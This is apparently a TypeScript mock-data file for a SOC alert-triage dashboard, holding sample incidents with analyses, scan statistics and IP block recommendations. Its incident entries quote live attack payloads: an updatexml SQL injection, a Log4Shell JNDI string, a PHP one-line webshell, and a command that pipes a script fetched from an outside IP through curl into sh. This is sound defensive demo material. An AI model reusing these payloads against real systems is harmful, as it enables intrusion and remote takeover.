import {
  AlertTriangle,
  MailWarning,
  Network,
  Radar,
  Shield,
  type LucideIcon,
} from 'lucide-react';

export type ScenarioKey = 'alerts' | 'assets' | 'intel' | 'vulnerabilities' | 'drills' | 'attackSurface';

export interface SocMetric {
  label: string;
  value: string;
  hint: string;
  tone: 'red' | 'orange' | 'blue' | 'green' | 'purple' | 'slate';
}

export interface ScenarioSummary {
  key: ScenarioKey;
  title: string;
  description: string;
  href: string;
  icon: LucideIcon;
  status: string;
  impact: string;
}

export const sharedStory = {
  incidentId: 'INC-2026-0522-017',
  attackerIp: '45.91.83.24',
  cve: 'CVE-2026-18411',
  asset: 'DMZ-WAF-02',
  assetOwner: '电商业务安全组',
  region: '华东一区 / 杭州机房',
  phishingCampaign: '2026 Q2 财务主题钓鱼演练',
  intelTopic: '边界设备远程命令执行利用链活跃',
};

export const socMetrics: SocMetric[] = [
  { label: '今日事件簇', value: '18', hint: '由 326 条原始告警聚合而来', tone: 'red' },
  { label: '待排查资产', value: '42', hint: '其中 7 台处于互联网暴露面', tone: 'orange' },
  { label: '待验证漏洞', value: '9', hint: `${sharedStory.cve} 已关联 3 台资产`, tone: 'purple' },
  { label: '自动化处置率', value: '68%', hint: '较上周提升 14%', tone: 'green' },
];

export const scenarioSummaries: ScenarioSummary[] = [
  {
    key: 'alerts',
    title: '告警运营',
    description: '把告警降噪、研判、深度调查放在一条连续工作流里。',
    href: '/soc/alerts',
    icon: AlertTriangle,
    status: '高优先级',
    impact: `${sharedStory.incidentId} 需要值班员确认`,
  },
];

export const supportingScenarios: ScenarioSummary[] = [];

export const threatTimeline = [
  { time: '09:12', title: 'NDR 发现异常出站连接', detail: `${sharedStory.asset} 访问 ${sharedStory.attackerIp}，命中 C2 行为模型。` },
  { time: '09:18', title: 'WAF 出现同源探测', detail: '同一来源 IP 对 3 个业务域名进行路径穿越和指纹探测。' },
  { time: '09:24', title: '微步情报命中', detail: `${sharedStory.attackerIp} 近 24 小时被标记为漏洞利用基础设施。` },
  { time: '09:31', title: 'Rex 合并为事件簇', detail: '326 条原始告警被聚合为 18 个事件簇，其中 1 个建议深度调查。' },
];

export const incidentClusters = [
  {
    id: 'NDR-2026-0614-001',
    title: 'WordPress SQL 注入攻击成功',
    rawAlerts: 1,
    confidence: 96,
    priority: 'P1',
    reason: 'NDR HTTP 日志命中 updatexml SQL 注入 payload，响应体回显 root@localhost。',
    owner: '应用安全组',
    srcIp: '106.12.35.52',
    ndrRule: 'NDR_HTTP_SQLI_UPDATEXML',
    request: {
      method: 'POST',
      host: 'www.example.com',
      uri: '/admin/dict/',
      payload: 'action=aa&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms][1]=1) or updatexml(0x7e,concat(1,user()),0x7e)#&query_vars[tax_query][1][field]=term_taxonomy_id',
      llmAnalysis: '请求参数中包含 updatexml(0x7e,concat(1,user()),0x7e) 典型 MySQL 报错注入语句，攻击者试图通过 XML 函数触发 XPath 错误并回显当前数据库用户。',
      evidence: ['updatexml 函数', 'concat(1,user())', '注释符 # 截断后续 SQL'],
    },
    response: {
      statusCode: 200,
      llmAnalysis: '响应体包含 SQL 查询语句、XPATH syntax error 以及 root@localhost，说明后端未屏蔽数据库错误，攻击者已获取数据库用户信息。',
      evidence: ['XPATH syntax error', 'root@localhost', 'HTTP 200'],
    },
    srcIntel: {
      verdict: '恶意',
      location: '中国 / 百度智能云',
      tags: ['暴力破解', '网络扫描', '动态 IP'],
      summary: '威胁情报显示该 IP 在 2023-03-16 到 2024-08-11 期间多次参与网络攻击，同 C 段存在 14 个恶意或可疑 IP。',
    },
    asset: {
      name: '124.222.108.178',
      business: 'WordPress 站点',
      exposure: '公网',
      owner: '应用安全组',
      criticality: '高',
      context: '测绘信息显示目标存在 MySQL、Nginx 等服务，MySQL Banner 为 5.6.50-log，漏洞情报匹配 CVE-2022-21661 影响范围。',
    },
    conclusion: {
      verdict: '攻击成功',
      summary: '该告警为 WordPress SQL 注入攻击，攻击者成功通过 updatexml 报错注入获取数据库用户信息。',
      recommendation: '封禁 106.12.35.52 及同 C 段可疑 IP，修复 CVE-2022-21661，将 WordPress 升级至 5.8.3 以上，并关闭生产环境 SQL 错误回显。',
    },
    actions: ['封禁源 IP', '升级 WordPress', '排查数据库访问日志', '生成漏洞修复工单'],
  },
  {
    id: 'NDR-2026-0614-002',
    title: '终端访问钓鱼登录口',
    rawAlerts: 1,
    confidence: 83,
    priority: 'P2',
    reason: 'NDR 发现财务终端访问的 URL 被微步情报标记为钓鱼登录页。',
    owner: '终端安全组',
    srcIp: '10.12.8.45',
    ndrRule: 'NDR_HTTP_PHISHING_LOGIN_INTEL',
    request: {
      method: 'GET',
      host: 'invoice-check.example',
      uri: '/login',
      payload: 'GET hxxps://invoice-check.example/login',
      llmAnalysis: '该告警核心证据不是攻击 payload，而是访问 URL hxxps://invoice-check.example/login 被微步情报标记为钓鱼 URL。NDR 仅提供终端到外部 URL 的访问事实，情报标签提供主要风险判断依据。',
      evidence: ['微步钓鱼 URL 标签', 'URL: hxxps://invoice-check.example/login', '财务终端访问', '供应商对账主题'],
    },
    response: {
      statusCode: 200,
      llmAnalysis: '响应体不是该告警的关键证据。该类告警应优先依赖 URL 情报、访问终端身份和邮件点击链路判断凭证钓鱼风险。',
      evidence: ['响应体非关键证据', '未作为主要判定依据'],
    },
    srcIntel: {
      verdict: '内部终端',
      location: '办公网 / 财务网段',
      tags: ['财务实习生终端', '邮件链接点击', '需要身份确认'],
      summary: '源地址 10.12.8.45 对应用户 li.yan，OA 显示为财务实习生，入职 12 天。EDR 记录浏览器由 outlook.exe 拉起，符合邮件钓鱼点击链路。',
    },
    asset: {
      name: 'invoice-check.example/login',
      business: '外部钓鱼登录页',
      exposure: '互联网',
      owner: '终端安全组',
      criticality: '中高',
      context: 'URL 被微步情报标记为钓鱼 URL，标签为 credential-phishing、fake-invoice-portal，和深度调查 INV-2026-0522-001 的邮件网关、EDR、OA 证据可关联。',
    },
    conclusion: {
      verdict: '疑似凭证钓鱼',
      summary: '该告警为终端访问钓鱼 URL 事件。核心证据是访问 URL 被微步情报标记为凭证钓鱼登录页，NDR 访问事实与财务终端身份共同指向凭证外泄风险。',
      recommendation: '转入深度调查 INV-2026-0522-001，临时冻结用户外部访问，重置密码，检索同主题邮件收件人并确认是否存在凭证提交行为。',
    },
    actions: ['转入深度调查', '临时冻结账号外部访问', '重置用户密码', '检索同主题邮件收件人'],
  },
  {
    id: 'NDR-2026-0614-003',
    title: 'Log4Shell JNDI 远程代码执行成功',
    rawAlerts: 1,
    confidence: 94,
    priority: 'P1',
    reason: 'NDR 识别 ${jndi:ldap://...} payload，目标应用随后向外部 LDAP 服务发起回连。',
    owner: '电商业务安全组',
    srcIp: '45.83.12.21',
    ndrRule: 'NDR_HTTP_LOG4SHELL_JNDI_RCE',
    request: {
      method: 'GET',
      host: 'shop-api.example.com',
      uri: '/api/search?q=phone',
      payload: 'User-Agent: ${jndi:ldap://45.83.12.21:1389/Exploit}',
      llmAnalysis: '请求头 User-Agent 中包含 ${jndi:ldap://45.83.12.21:1389/Exploit}，这是 Log4Shell 漏洞利用的典型触发方式。攻击者试图诱导 Log4j 解析 JNDI 表达式并向外部 LDAP 服务加载恶意类。',
      evidence: ['${jndi:ldap://...}', 'User-Agent 注入', '外部 LDAP 1389 端口'],
    },
    response: {
      statusCode: 200,
      llmAnalysis: 'HTTP 响应本身返回 200，但更关键的是 NDR 随后观测到目标资产 shop-api.example.com 向 45.83.12.21:1389 发起 LDAP 回连，并在 4 秒后访问 /Exploit.class。该行为说明 JNDI 表达式已被服务端解析，漏洞利用高度可能成功。',
      evidence: ['HTTP 200', 'LDAP 回连 45.83.12.21:1389', 'GET /Exploit.class', '应用异常日志出现 JndiLookup'],
    },
    srcIntel: {
      verdict: '恶意',
      location: '荷兰 / AS9009',
      tags: ['Log4Shell 利用', 'PoC 投递', '恶意 LDAP 服务'],
      summary: '该源 IP 近期多次投递 JNDI payload，并开放 1389、8080 等用于 Log4Shell 利用链的常见端口，历史上与漏洞利用基础设施相关。',
    },
    asset: {
      name: 'shop-api.example.com',
      business: '电商搜索 API',
      exposure: '公网',
      owner: '电商业务安全组',
      criticality: '高',
      context: '资产运行 Java Spring Boot 应用，历史 SBOM 显示存在 log4j-core 2.14.1 组件，版本处于 CVE-2021-44228 影响范围。',
    },
    conclusion: {
      verdict: '疑似成功利用',
      summary: '该告警为 Log4Shell JNDI 远程代码执行攻击，NDR 同时观测到入站 JNDI payload 和目标资产对攻击源 LDAP 服务的出站回连，说明服务端很可能解析并触发了漏洞利用链。',
      recommendation: '立即隔离 shop-api.example.com 出网访问，封禁 45.83.12.21，升级 log4j-core 至安全版本，排查 JVM 进程、临时目录、启动项和异常外联。',
    },
    actions: ['隔离资产出网', '封禁源 IP', '升级 Log4j 组件', '排查 JVM 和主机痕迹'],
  },
  {
    id: 'NDR-2026-0614-005',
    title: 'WebShell 远控命令执行成功',
    rawAlerts: 1,
    confidence: 95,
    priority: 'P1',
    reason: 'NDR 识别 WebShell 参数化命令执行流量，响应体回显系统用户和主机信息。',
    owner: '内容平台安全组',
    srcIp: '185.220.101.47',
    ndrRule: 'NDR_HTTP_WEBSHELL_REMOTE_COMMAND',
    request: {
      method: 'POST',
      host: 'cms.example.com',
      uri: '/uploads/2026/06/cache.jsp',
      payload: 'cmd=id;uname -a;curl http://185.220.101.47:8080/stage.sh|sh',
      llmAnalysis: '请求命中上传目录下的可疑 JSP 文件，并通过 cmd 参数连续执行 id、uname -a 和远程脚本下载命令。该行为不属于正常业务请求，符合 WebShell 远控执行特征。',
      evidence: ['上传目录 JSP 文件', 'cmd 参数', 'id/uname 命令', 'curl|sh 下载执行'],
    },
    response: {
      statusCode: 200,
      llmAnalysis: '响应体返回 uid=1001(www-data)、Linux 内核版本和主机名 cms-prod-02，说明攻击者提交的系统命令已经被目标服务器执行。随后 NDR 还观测到目标主机访问 185.220.101.47:8080/stage.sh，存在二阶段载荷下载风险。',
      evidence: ['HTTP 200', 'uid=1001(www-data)', 'Linux cms-prod-02', 'stage.sh 外联下载'],
    },
    srcIntel: {
      verdict: '恶意',
      location: '德国 / Tor Exit',
      tags: ['WebShell 控制端', '匿名代理', '二阶段载荷'],
      summary: '该 IP 被多源情报标记为匿名代理和恶意载荷分发节点，近 7 天内与多起 WebShell 控制和反弹连接活动相关。',
    },
    asset: {
      name: 'cms.example.com',
      business: '内容管理平台',
      exposure: '公网',
      owner: '内容平台安全组',
      criticality: '高',
      context: '资产提供内容发布和附件上传能力，部署在 DMZ 应用区。历史巡检显示上传目录曾存在脚本执行权限配置不当风险。',
    },
    conclusion: {
      verdict: '攻击成功',
      summary: '该告警为 WebShell 远控命令执行事件。攻击者通过已落地的 JSP WebShell 执行系统命令，并触发二阶段脚本下载，说明目标主机已经被远程控制。',
      recommendation: '立即隔离 cms.example.com，保全 Web 根目录、进程、网络连接和系统审计日志，删除 WebShell 前先完成取证，并排查同目录下其他可疑脚本和横向移动痕迹。',
    },
    actions: ['隔离受害主机', '封禁控制端 IP', '保全 WebShell 样本', '排查二阶段载荷和横向移动'],
  },
  {
    id: 'NDR-2026-0614-006',
    title: '文件上传接口 WebShell 投递尝试',
    rawAlerts: 1,
    confidence: 86,
    priority: 'P2',
    reason: 'multipart 上传包含 php 代码片段，响应返回上传成功 JSON。',
    owner: '内容平台安全组',
    srcIp: '193.36.119.42',
    ndrRule: 'NDR_HTTP_WEBSHELL_UPLOAD',
    request: {
      method: 'POST',
      host: 'cms.example.com',
      uri: '/api/upload',
      payload: 'filename=shell.php&content=<?php system($_GET["cmd"]); ?>',
      llmAnalysis: '上传内容包含 PHP system 函数和 cmd 参数，符合轻量 WebShell 投递特征；文件名后缀为 php，风险较高。',
      evidence: ['shell.php', 'system($_GET["cmd"])', 'multipart/form-data'],
    },
    response: {
      statusCode: 200,
      llmAnalysis: '响应 JSON 中出现 upload success 和可访问 URL 字段，说明服务端可能接受了上传文件，需要立即验证文件是否落盘和可执行。',
      evidence: ['upload success', '/uploads/2026/06/shell.php', 'HTTP 200'],
    },
    srcIntel: {
      verdict: '恶意',
      location: '英国 / AS61317',
      tags: ['黑灰产扫描', 'WebShell 投递', '匿名代理'],
      summary: '该 IP 被多源情报标记为 WebShell 投递和弱口令扫描基础设施。',
    },
    asset: {
      name: 'cms.example.com',
      business: '内容管理平台',
      exposure: '公网',
      owner: '内容平台安全组',
      criticality: '中高',
      context: '资产提供内容上传能力，历史上存在插件上传路径暴露问题，需要确认上传目录执行权限。',
    },
    conclusion: {
      verdict: '疑似上传成功',
      summary: '请求为明确 WebShell 投递，响应显示上传成功，需立即确认文件落盘和访问情况。',
      recommendation: '封禁源 IP，删除可疑上传文件，关闭上传目录脚本执行权限，并检查是否存在后续命令执行访问。',
    },
    actions: ['加入 FW 阻断', '删除可疑文件', '关闭上传目录执行权限', '排查后续访问'],
  },
];

export const alertDenoiseDailySummary = {
  date: '2026-06-14',
  scope: '全部告警源 / 全部安全域',
  rawCount: 9836,
  normalizedCount: 9836,
  filterRemovedCount: 6944,
  dedupRemovedCount: 1869,
  triageCount: 1023,
  normalizeFailedCount: 0,
  workflow: {
    name: 'stream_alert_denoise',
    chain: ['receive_alert', 'normalize', 'filter_logs', 'dedup_and_write'],
    strictFields: ['sip', 'dip'],
    lshFields: ['req_http_url', 'req_body', 'rsp_body'],
    threshold: 0.7,
  },
  categories: [
    {
      key: 'scan',
      title: '扫描告警',
      removed: 3428,
      ratio: '34.9%',
      trend: '+6.2%',
      description: '外部扫描器、搜索引擎、测绘引擎、内部扫描任务',
      reasons: ['外部通用扫描器探测登录口', '搜索引擎/测绘引擎访问公开路径', '内部安全工具周期扫描'],
    },
    {
      key: 'duplicate',
      title: '重复告警',
      removed: 1869,
      ratio: '19.0%',
      trend: '-2.4%',
      description: '相同源目 IP 与相似 URI/body 的 LSH 聚合',
      reasons: ['相同源目 IP 反复命中', 'URI 参数归一化后高度相似', '跨批次 dedup key 已见'],
    },
    {
      key: 'condition',
      title: '条件过滤',
      removed: 1124,
      ratio: '11.4%',
      trend: '+1.1%',
      description: '非 HTTP、方向不在研判范围、字段缺失',
      reasons: ['非 HTTP 入站噪声', '字段不足无法进入研判', '横向扫描按低优先级归档'],
    },
    {
      key: 'rule',
      title: '规则过滤',
      removed: 782,
      ratio: '8.0%',
      trend: '-0.8%',
      description: '低价值规则、噪声规则、长期误报规则',
      reasons: ['通用爬虫访问规则', '目录枚举低价值命中', '运维脚本长期误报'],
    },
    {
      key: 'allowlist',
      title: '黑白名单',
      removed: 738,
      ratio: '7.5%',
      trend: '+0.6%',
      description: '授权扫描器、搜索引擎白名单、黑灰产聚合',
      reasons: ['授权漏扫平台白名单', '搜索引擎爬虫白名单候选', '黑灰产 IP 聚合为情报事件'],
    },
  ],
  scanReport: {
    title: '扫描告警分析日报',
    conclusion: '今日扫描类告警共 3,428 条，占原始告警 34.9%。其中外部扫描占 72.4%，内部扫描占 27.6%。扫描主要集中在登录口、配置文件、管理后台和框架指纹路径。',
    metrics: [
      { label: '扫描告警总数', value: '3,428' },
      { label: '外部扫描', value: '2,482' },
      { label: '内部扫描', value: '946' },
      { label: '被扫描资产', value: '183' },
      { label: '被扫描路径', value: '1,276' },
      { label: '独立源 IP', value: '392' },
      { label: '200 响应', value: '312' },
      { label: '404 响应', value: '2,761' },
    ],
    sourceDistribution: [
      { type: '外部扫描器', alerts: 820, ips: 146, feature: '高频路径探测、UA 随机、命中登录口' },
      { type: '搜索引擎', alerts: 830, ips: 64, feature: 'Baiduspider / Googlebot，访问公开页面、sitemap 和静态资源' },
      { type: '测绘引擎', alerts: 356, ips: 42, feature: '指纹探测、端口探活、标题抓取' },
      { type: '黑灰产扫描', alerts: 270, ips: 81, feature: '弱口令、漏洞 PoC、敏感文件探测' },
      { type: '未知外部扫描', alerts: 206, ips: 93, feature: '短时低频探测，来源归属暂未识别' },
      { type: '内部扫描器', alerts: 946, ips: 21, feature: '企业授权扫描任务、基线巡检' },
    ],
    assets: [
      { asset: 'login.shop.example.com', domain: '电商登录', exposure: '公网', scans: 486, ok: 73, notFound: 368, other: 45, paths: '登录口: /login, /admin, /api/auth；通用探活: /favicon.ico' },
      { asset: 'api.pay.example.com', domain: '支付 API', exposure: '公网', scans: 392, ok: 28, notFound: 331, other: 33, paths: '配置文件: /config, /.env；框架指纹: /actuator, /swagger-ui；业务接口: /v1/user' },
      { asset: 'oa.example.com', domain: 'OA 门户', exposure: '公网', scans: 311, ok: 64, notFound: 211, other: 36, paths: '登录口: /portal, /vpn, /sso；文件上传口: /upload；敏感文件: /backup.zip' },
      { asset: '10.20.8.17', domain: '生产应用', exposure: '内网', scans: 286, ok: 41, notFound: 226, other: 19, paths: '通用探活: /health；框架指纹: /metrics；Debug: /debug；配置文件: /application.yml' },
    ],
    pathIntent: [
      { type: '登录口', paths: '/login, /admin, /wp-login.php', alerts: 864, risk: '常见爆破和后台探测入口' },
      { type: '配置文件', paths: '/.env, /config.json, /application.yml', alerts: 517, risk: '可能暴露凭据和服务配置' },
      { type: '框架指纹', paths: '/actuator, /swagger-ui, /server-status', alerts: 421, risk: '用于识别技术栈和管理端' },
      { type: '敏感文件', paths: '/backup.zip, /db.sql, /.git/config', alerts: 389, risk: '可能直接造成数据泄露' },
      { type: '通用探活', paths: '/, /favicon.ico, /robots.txt', alerts: 1237, risk: '多为搜索引擎和测绘探活' },
    ],
    statusCodes: [
      { code: '404', count: 2761, ratio: '80.5%', explanation: '大部分扫描路径不存在，可作为低价值噪声' },
      { code: '200', count: 312, ratio: '9.1%', explanation: '路径存在或返回有效内容，需要关注' },
      { code: '301/302', count: 201, ratio: '5.9%', explanation: '多为登录跳转或站点重定向' },
      { code: '401/403', count: 116, ratio: '3.4%', explanation: '有认证或访问控制，仍需关注暴露面' },
      { code: '5xx', count: 38, ratio: '1.1%', explanation: '可能触发异常，需关联应用日志' },
    ],
    successfulAssets: [
      { asset: 'login.shop.example.com', business: '电商登录', exposure: '公网', okCount: 73, sensitive: '登录口 / SSO 回调', examples: '/login, /sso/callback, /api/auth/login', risk: '高', recommendation: '限制后台路径访问，关联 WAF 登录爆破规则' },
      { asset: 'oa.example.com', business: 'OA 门户', exposure: '公网', okCount: 64, sensitive: '登录口 / 文件上传口', examples: '/portal/login, /upload, /api/file/preview', risk: '高', recommendation: '确认上传鉴权和文件类型校验' },
      { asset: 'admin.crm.example.com', business: 'CRM 管理后台', exposure: '公网', okCount: 46, sensitive: '管理后台', examples: '/admin, /admin/user, /admin/export', risk: '高', recommendation: '建议仅 VPN 或办公出口访问' },
      { asset: 'api.pay.example.com', business: '支付 API', exposure: '公网', okCount: 28, sensitive: '接口文档 / 健康检查', examples: '/swagger-ui, /actuator/health, /v1/status', risk: '中', recommendation: 'Swagger 和 actuator 不应公网开放' },
      { asset: '10.20.8.17', business: '生产应用', exposure: '内网', okCount: 41, sensitive: '监控指标 / Debug', examples: '/metrics, /debug, /health', risk: '中', recommendation: '确认仅授权扫描器可访问' },
      { asset: 'files.example.com', business: '文件服务', exposure: '公网', okCount: 23, sensitive: '文件上传口 / 下载口', examples: '/upload, /download, /preview', risk: '高', recommendation: '检查匿名上传和临时链接策略' },
      { asset: 'vpn.example.com', business: 'VPN 网关', exposure: '公网', okCount: 18, sensitive: '登录口', examples: '/login, /remote/login, /ssl-vpn', risk: '高', recommendation: '联动弱口令和异常登录检测' },
      { asset: 'jenkins.build.local', business: '构建平台', exposure: '内网', okCount: 13, sensitive: '管理后台 / 插件接口', examples: '/login, /manage, /scriptText', risk: '高', recommendation: '未授权内部扫描源需转研判' },
      { asset: 'monitor.ops.example.com', business: '监控平台', exposure: '公网', okCount: 11, sensitive: '监控面板 / 指标接口', examples: '/grafana/login, /prometheus, /api/datasources', risk: '高', recommendation: '确认是否误暴露公网，限制访问来源' },
      { asset: 'wiki.example.com', business: '知识库', exposure: '公网', okCount: 9, sensitive: '登录口 / 附件预览', examples: '/login, /attachments, /pages/viewpage.action', risk: '中', recommendation: '检查匿名访问和附件下载权限' },
    ],
    externalSources: [
      { source: '45.83.12.21', type: '黑灰产', region: '荷兰 / AS9009', alerts: 126, assets: 18, okCount: 37, ua: 'python-requests/2.31', action: '保留情报关联，必要时封禁' },
      { source: '66.249.66.1', type: 'Googlebot', region: '美国 / Google', alerts: 118, assets: 31, okCount: 22, ua: 'Googlebot/2.1', action: '搜索引擎白名单候选' },
      { source: '220.181.108.15', type: 'Baiduspider', region: '中国 / 百度', alerts: 106, assets: 27, okCount: 19, ua: 'Baiduspider/2.0', action: '搜索引擎白名单候选' },
      { source: '198.235.24.44', type: '测绘引擎', region: '加拿大 / Censys', alerts: 83, assets: 22, okCount: 11, ua: 'CensysInspect/1.1', action: '低价值噪声，保留趋势' },
      { source: '167.94.138.51', type: '测绘引擎', region: '美国 / Censys', alerts: 79, assets: 20, okCount: 9, ua: 'CensysInspect/1.1', action: '低价值噪声，保留趋势' },
      { source: '162.142.125.12', type: '测绘引擎', region: '美国 / Shadowserver', alerts: 72, assets: 17, okCount: 8, ua: 'Mozilla/5.0 zgrab/0.x', action: '保留趋势，不进入研判' },
      { source: '87.236.176.33', type: '外部扫描器', region: '德国 / Internet Census', alerts: 68, assets: 15, okCount: 5, ua: 'InternetMeasurement/1.0', action: '低优先级归档' },
      { source: '185.220.101.47', type: '匿名代理', region: '德国 / Tor Exit', alerts: 63, assets: 9, okCount: 14, ua: 'curl/8.1.2', action: '转入情报聚合事件' },
      { source: '193.36.119.42', type: '黑灰产', region: '英国 / AS61317', alerts: 57, assets: 7, okCount: 18, ua: 'Go-http-client/1.1', action: '关注 200 响应路径' },
      { source: '104.152.52.29', type: '外部扫描器', region: '美国 / VPS', alerts: 49, assets: 6, okCount: 7, ua: 'masscan/1.3', action: '端口扫描噪声，保留样本' },
    ],
    internalSources: [
      { ip: '10.10.5.23', owner: '漏扫平台', alerts: 412, assets: 96, okCount: 58, task: '周期漏洞扫描', authorized: '是', action: '加入白名单并保留审计' },
      { ip: '10.10.5.24', owner: '基线巡检', alerts: 233, assets: 51, okCount: 31, task: '配置基线检查', authorized: '是', action: '降低研判优先级' },
      { ip: '10.12.8.66', owner: '未登记主机', alerts: 187, assets: 33, okCount: 44, task: '横向端口探测', authorized: '否', action: '转入研判或调查' },
      { ip: '10.20.1.18', owner: '运维脚本', alerts: 114, assets: 12, okCount: 16, task: '健康检查', authorized: '待确认', action: '补充资产标签' },
      { ip: '10.30.16.8', owner: '红队演练平台', alerts: 98, assets: 24, okCount: 21, task: '授权攻防演练', authorized: '是', action: '按演练窗口归档' },
      { ip: '10.60.2.19', owner: '未知办公终端', alerts: 76, assets: 18, okCount: 19, task: '目录枚举', authorized: '否', action: '转入终端排查' },
      { ip: '172.16.4.31', owner: '容器安全扫描', alerts: 64, assets: 15, okCount: 12, task: '镜像和服务探测', authorized: '是', action: '关联容器资产标签' },
      { ip: '10.70.9.102', owner: '资产测绘任务', alerts: 53, assets: 39, okCount: 8, task: '内网资产发现', authorized: '是', action: '加入授权扫描器列表' },
      { ip: '192.168.12.45', owner: '测试环境主机', alerts: 47, assets: 11, okCount: 13, task: '脚本探活', authorized: '待确认', action: '确认 owner 和任务窗口' },
      { ip: '10.80.3.77', owner: '未知服务器', alerts: 39, assets: 8, okCount: 10, task: '管理端探测', authorized: '否', action: '转入内部威胁研判' },
    ],
    sourceIpInventory: [
      { ip: '45.83.12.21', side: '外部', type: '黑灰产', region: '荷兰', asn: 'AS9009', intel: '恶意扫描 / PoC 投递', alerts: 126, assets: 18, okCount: 37, sensitiveHits: 12, firstSeen: '08:41', lastSeen: '16:58', topPath: '/admin, /.env, /upload', risk: '高', disposition: '建议加入 FW 阻断' },
      { ip: '185.220.101.47', side: '外部', type: '匿名代理', region: '德国', asn: 'Tor Exit', intel: '匿名出口 / 弱口令探测', alerts: 63, assets: 9, okCount: 14, sensitiveHits: 7, firstSeen: '09:33', lastSeen: '17:12', topPath: '/login, /vpn, /wp-login.php', risk: '高', disposition: '建议加入 FW 阻断' },
      { ip: '193.36.119.42', side: '外部', type: '黑灰产', region: '英国', asn: 'AS61317', intel: '漏洞扫描基础设施', alerts: 57, assets: 7, okCount: 18, sensitiveHits: 6, firstSeen: '10:19', lastSeen: '18:04', topPath: '/actuator, /swagger-ui', risk: '高', disposition: '关注 200 响应路径' },
      { ip: '66.249.66.1', side: '外部', type: '搜索引擎', region: '美国', asn: 'Google', intel: '合法爬虫', alerts: 118, assets: 31, okCount: 22, sensitiveHits: 0, firstSeen: '00:21', lastSeen: '23:40', topPath: '/, /robots.txt, /sitemap.xml', risk: '低', disposition: '白名单候选' },
      { ip: '220.181.108.15', side: '外部', type: '搜索引擎', region: '中国', asn: '百度', intel: '合法爬虫', alerts: 106, assets: 27, okCount: 19, sensitiveHits: 0, firstSeen: '01:08', lastSeen: '22:17', topPath: '/, /favicon.ico, /news', risk: '低', disposition: '白名单候选' },
      { ip: '198.235.24.44', side: '外部', type: '测绘引擎', region: '加拿大', asn: 'Censys', intel: '互联网测绘', alerts: 83, assets: 22, okCount: 11, sensitiveHits: 2, firstSeen: '03:46', lastSeen: '21:31', topPath: '/server-status, /actuator', risk: '中', disposition: '保留趋势' },
      { ip: '167.94.138.51', side: '外部', type: '测绘引擎', region: '美国', asn: 'Censys', intel: '互联网测绘', alerts: 79, assets: 20, okCount: 9, sensitiveHits: 1, firstSeen: '05:02', lastSeen: '20:45', topPath: '/, /title, /favicon.ico', risk: '中', disposition: '保留趋势' },
      { ip: '10.12.8.66', side: '内部', type: '未授权主机', region: '办公网', asn: 'N/A', intel: '横向扫描', alerts: 187, assets: 33, okCount: 44, sensitiveHits: 15, firstSeen: '11:09', lastSeen: '17:39', topPath: '/admin, /manage, /metrics', risk: '高', disposition: '转入研判并临时阻断' },
      { ip: '10.60.2.19', side: '内部', type: '未知办公终端', region: '办公网', asn: 'N/A', intel: '目录枚举', alerts: 76, assets: 18, okCount: 19, sensitiveHits: 8, firstSeen: '13:22', lastSeen: '18:27', topPath: '/upload, /download, /backup.zip', risk: '高', disposition: '转入终端排查' },
      { ip: '10.80.3.77', side: '内部', type: '未知服务器', region: '生产网', asn: 'N/A', intel: '管理端探测', alerts: 39, assets: 8, okCount: 10, sensitiveHits: 5, firstSeen: '14:11', lastSeen: '16:42', topPath: '/jenkins, /admin, /scriptText', risk: '高', disposition: '转入内部威胁研判' },
      { ip: '10.10.5.23', side: '内部', type: '授权扫描器', region: '安全工具区', asn: 'N/A', intel: '周期漏洞扫描', alerts: 412, assets: 96, okCount: 58, sensitiveHits: 21, firstSeen: '02:00', lastSeen: '04:30', topPath: '/login, /swagger-ui, /actuator', risk: '低', disposition: '加入授权扫描器白名单' },
      { ip: '10.10.5.24', side: '内部', type: '授权扫描器', region: '安全工具区', asn: 'N/A', intel: '基线巡检', alerts: 233, assets: 51, okCount: 31, sensitiveHits: 9, firstSeen: '03:00', lastSeen: '05:10', topPath: '/health, /metrics, /config', risk: '低', disposition: '加入授权扫描器白名单' },
    ],
    blockRecommendations: [
      { ip: '45.83.12.21', scope: '边界 FW / WAF', reason: '黑灰产扫描，命中登录口和配置文件路径', evidence: '126 条告警 / 37 次 200 / 12 次敏感命中', action: '加入临时封禁 7 天', priority: '高', owner: '边界安全组' },
      { ip: '185.220.101.47', scope: '边界 FW', reason: 'Tor 出口节点，弱口令和 VPN 登录口探测', evidence: '63 条告警 / 14 次 200 / 7 次敏感命中', action: '加入封禁并开启登录口观察', priority: '高', owner: '办公网安全组' },
      { ip: '193.36.119.42', scope: 'WAF / API 网关', reason: '漏洞扫描基础设施，访问 actuator 和 swagger', evidence: '57 条告警 / 18 次 200 / 6 次敏感命中', action: '封禁并复核 API 暴露面', priority: '高', owner: '应用安全组' },
      { ip: '10.12.8.66', scope: '内网 FW / NAC', reason: '未登记主机发起横向扫描', evidence: '187 条告警 / 44 次 200 / 15 次敏感命中', action: '临时隔离并转入研判', priority: '高', owner: '终端安全组' },
      { ip: '10.60.2.19', scope: '办公网 ACL', reason: '未知办公终端枚举上传和备份路径', evidence: '76 条告警 / 19 次 200 / 8 次敏感命中', action: '限制到生产网访问并排查终端', priority: '高', owner: '办公网安全组' },
    ],
    internalScannerChecklist: [
      { ip: '10.10.5.23', owner: '漏扫平台', status: '已授权', expectedWindow: '每日 02:00-04:30', finding: '任务窗口、源 IP 和扫描范围匹配', nextStep: '加入授权扫描器白名单，保留审计' },
      { ip: '10.10.5.24', owner: '基线巡检', status: '已授权', expectedWindow: '每日 03:00-05:10', finding: '基线巡检任务正常，命中路径以 health/metrics 为主', nextStep: '降低研判优先级，保留趋势' },
      { ip: '10.30.16.8', owner: '红队演练平台', status: '已授权', expectedWindow: '演练窗口 10:00-18:00', finding: '与 Q2 授权攻防演练计划匹配', nextStep: '按演练标签归档，不加入封禁' },
      { ip: '10.12.8.66', owner: '未登记主机', status: '未授权', expectedWindow: '无登记', finding: '横向扫描 33 台资产，命中多个管理后台', nextStep: '转入研判，联动 EDR 拉取进程和登录记录' },
      { ip: '10.60.2.19', owner: '未知办公终端', status: '未授权', expectedWindow: '无登记', finding: '目录枚举和文件上传口探测，行为不符合办公终端基线', nextStep: '通知终端安全组隔离核查' },
      { ip: '192.168.12.45', owner: '测试环境主机', status: '待确认', expectedWindow: '未登记', finding: '脚本探活集中在测试与生产混合网段', nextStep: '补充 owner、任务单和扫描范围' },
      { ip: '10.80.3.77', owner: '未知服务器', status: '未授权', expectedWindow: '无登记', finding: '探测 Jenkins、admin、scriptText 等高敏路径', nextStep: '转入内部威胁研判，必要时临时阻断' },
    ],
  },
  duplicateReport: {
    clusters: 1842,
    dedupKeys: 1023,
    ratio: '64.8%',
    rows: [
